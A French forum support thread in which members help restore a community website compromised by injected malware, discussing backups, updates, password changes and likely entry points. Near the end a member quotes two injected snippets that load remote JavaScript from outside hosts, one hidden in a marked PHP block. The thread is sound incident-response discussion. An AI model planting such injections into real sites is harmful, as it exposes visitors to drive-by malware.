Site Haker
Version 3.10
Support Général
ElenWii Membre non connecté
- Administrateur
- Voir le profil du membre ElenWii
- Inscrit le : 14/08/2009
- Site internet
- Groupes :
- Equipe Graphique
Reprise du message précédent
Reidlos on peut ptetre faire une MAJ v4 à partir de la 3.0.8 ?PascalD36 Membre non connecté
Booster Bazooka
- Booster Bazooka
- Voir le profil du membre PascalD36
- Inscrit le : 12/05/2009
- Site internet
PascalD36 Membre non connecté
Booster Bazooka
- Booster Bazooka
- Voir le profil du membre PascalD36
- Inscrit le : 12/05/2009
- Site internet
le site est pas sur ovh mais heberger sur redcoruna donc chez les espagnols
on a eu quand meme une sauvegrade de fichier d'un membre
on a effacé les fichiers du ftp puis remis a partir de la sauvegarde
malgré cela le probleme persiste
ma question est ce que le script en question a pu se loger dans la base sql ?
PascalD36 Membre non connecté
Booster Bazooka
- Booster Bazooka
- Voir le profil du membre PascalD36
- Inscrit le : 12/05/2009
- Site internet
on a reussi a s'en sortir
restauration des fichiers ftp via une vielle sauvegarde en 3.0
mise a jour progressive de 3.0 vers 3.11
suppression d'un post trouver sur le forum pointant vers le hack
tout semble refonctionner comme avant hors mis divers lien cassé et des images manquantes mais rien de grave, des classement a remettres etc....
bien sur une sauvegarde vient d'etre faite pour le ftp aisnsi que la base sql
l'admin va changer par precaution tout les mots de passe
merci a tous pour votre aide
a savoir que le site sera tranferer en france sur OVH puisque l'asso a un herbgement dessus qui sert pas
par contre il y a un truc que je comprends pas sur le lien
http://sitecheck.sucuri.net/results/indrepoker.com
apres re scan on apparait toujours avec le malware ?
les pages cités n'ont plus le script
Édité par PascalD36 Le 26/11/2013 à 19h56
janus57 Membre non connecté
- Booster Fusée
- Voir le profil du membre janus57
- Inscrit le : 07/12/2007
- Groupes :
- Equipe Assistance
PascalD36 :des news
on a reussi a s'en sortir
restauration des fichiers ftp via une vielle sauvegarde en 3.0
mise a jour progressive de 3.0 vers 3.11
suppression d'un post trouver sur le forum pointant vers le hack
tout semble refonctionner comme avant hors mis divers lien cassé et des images manquantes mais rien de grave, des classement a remettres etc....
bien sur une sauvegarde vient d'etre faite pour le ftp aisnsi que la base sql
l'admin va changer par precaution tout les mots de passe
merci a tous pour votre aide
a savoir que le site sera tranferer en france sur OVH puisque l'asso a un herbgement dessus qui sert pas
par contre il y a un truc que je comprends pas sur le lien
http://sitecheck.sucuri.net/results/indrepoker.com
apres re scan on apparait toujours avec le malware ?
les pages cités n'ont plus le script
Bonsoir,
cette autre site indique que c'est une image GIF qui est detecté comme dangereuse (faux positif ?)
http://quttera.com/detailed_report/indrepoker.com
Cordialement, janus57
PascalD36 Membre non connecté
Booster Bazooka
- Booster Bazooka
- Voir le profil du membre PascalD36
- Inscrit le : 12/05/2009
- Site internet
ceci dit tout allait bien hier et ce matin le prob de hack est present donc moi j'en deduis que le mot de passe ftp est eventé je ne vois pas d'autre solution
je vois pas comment il peut en etre autrement
le hack est present uniquement sur l'admin et forum
je restore a nouveau le ftp ce matin
ElenWii Membre non connecté
- Administrateur
- Voir le profil du membre ElenWii
- Inscrit le : 14/08/2009
- Site internet
- Groupes :
- Equipe Graphique
PascalD36 Membre non connecté
Booster Bazooka
- Booster Bazooka
- Voir le profil du membre PascalD36
- Inscrit le : 12/05/2009
- Site internet
ceci dit j'ai reussi dans une certaine mesure a reparer ce matin le site
j'ai telecharger la version full 3.11 et et mis sur le ftp apres avoir tout effacer en gardant bien le fichier config et table
remis le thme indrepoker a l'origine j'en avait une copie
le bug n'est plus present
donc affaire a suivre pour voir si il revient il est domage qu'on a pas de fichier log j'aurai bien aimer savoir comment il entre ce hack et par qui
si le site tourne correctement on migrera sur ovh le site
janus57 Membre non connecté
- Booster Fusée
- Voir le profil du membre janus57
- Inscrit le : 07/12/2007
- Groupes :
- Equipe Assistance
simple, soit le hacker est directement aller sur le FTP (mauvaise sécu de l'hébergeur, virus sur le PC de celui qui avait les pass FTP, interception du pass FTP cat connexion en mode FTP et non FTPES etc...)
ou alors il a utilise la faille présent dans la module galerie et qui a été corrigé en version 3.0.10
Cordialement, janus57
PascalD36 Membre non connecté
Booster Bazooka
- Booster Bazooka
- Voir le profil du membre PascalD36
- Inscrit le : 12/05/2009
- Site internet
moi j'ai juste remarque 2 scripte bizarres
celui ci lors du premier constat
Code PHP :
<script src="http://waysidegrill.com/_NEW/G9RU1v78.php?id=48852683" type="text/javascript"></script>
et celui ci aujourd'hui
Code PHP :
<?php #13c26a# if(empty($zsl)) { $zsl = "<script src="http://mobile.capco.wikiui.com/dVZTJirT.php?id=52126320" type="text/javascript"></script>"; echo $zsl; } #/13c26a# ?>
et comme un probleme arrive jamais seul je viens d'apprendre que le server cher redcoruna s'arretait au 1 er decembre donc il va falloir installer rapidement chez ovh et faire pointer les dns
cela fait du travail en perspective
Édité par PascalD36 Le 27/11/2013 à 15h52
Répondre
Vous n'êtes pas autorisé à écrire dans cette catégorie